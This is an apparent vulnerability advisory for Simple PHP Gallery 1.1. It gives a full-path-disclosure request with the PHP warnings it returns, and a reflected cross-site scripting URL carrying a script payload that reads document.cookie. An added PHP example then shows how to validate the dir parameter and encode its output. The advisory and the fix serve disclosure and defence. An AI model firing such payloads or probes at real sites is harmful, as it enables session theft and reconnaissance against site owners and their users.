
Cross site scripting & fullpath disclosure



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+Credit by : Al7ejaz Hacker														+
+																	+
+Script : Simple PHP Gallery 1.1													+
+Impact : Cross site scripting & fullpath disclosure											+
+																	+
+																	+
+Fullpath disclosure :															+
+																	+
+http://localhost/sp_index.php?dir=[Somthingwrong]											+
+																	+
+Result																	+
+																	+
+																	+
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10	+
+																	+
+Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11	+
+																	+
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147					+
+																	+
+																	+
+																	+
+																	+
+Cross Site Scripting															+
+																	+
+																	+
+																	+
+The dir variable is not properly verified and can be used to execute HTML and JavaScript code					+
+																	+
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script>								+
+																	+
+/Milw0rm																+
+																	+
+																	+
+in subject hot :  Cross site scripting & fullpath disclosure  ;)									+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
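
One way to close both issues from the defender's side, as an added example that is not code from Simple PHP Gallery or from the advisory's author. GALLERY_ROOT, resolve_gallery_dir(), list_gallery_dir() and h() are hypothetical names, and the example assumes the script reflects dir into the page and passes it to a directory-listing call, as the warnings above indicate.

```php
<?php
// Added example; not Simple PHP Gallery code. GALLERY_ROOT, resolve_gallery_dir(),
// list_gallery_dir() and h() are hypothetical names.
ini_set('display_errors', '0');  // keep warnings (and their absolute paths) out of responses
ini_set('log_errors', '1');      // still record them server-side

const GALLERY_ROOT = __DIR__ . '/images';  // assumption: base directory holding the galleries

// Map the user-supplied dir to a real directory under $root, or null if it is
// missing, not a directory, or resolves outside $root (../, symlinks).
function resolve_gallery_dir(string $root, string $requested): ?string
{
    $rootReal = realpath($root);
    if ($rootReal === false || strpos($requested, "\0") !== false) {
        return null;
    }
    $candidate = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_dir($candidate)) {
        return null;  // checked before any opendir/scandir call, so no warning is raised
    }
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    $inside = $candidate === $rootReal || strncmp($candidate, $prefix, strlen($prefix)) === 0;
    return $inside ? $candidate : null;
}

function list_gallery_dir(string $path): array
{
    $entries = scandir($path);
    return $entries === false ? [] : array_values(array_diff($entries, ['.', '..']));
}

// Encode for HTML output so a reflected value is rendered as text, not markup.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$requested = $_GET['dir'] ?? '';
$path = is_string($requested) ? resolve_gallery_dir(GALLERY_ROOT, $requested) : null;
if ($path === null) {
    http_response_code(404);
    exit('Gallery not found.');  // generic message, no path or input echoed
}
echo '<h1>', h($requested), '</h1><ul>';
foreach (list_gallery_dir($path) as $name) {
    echo '<li>', h($name), '</li>';
}
echo '</ul>';
```

With this handling, an invalid dir value produces a generic 404 instead of PHP warnings, and a dir value containing markup is rendered as text.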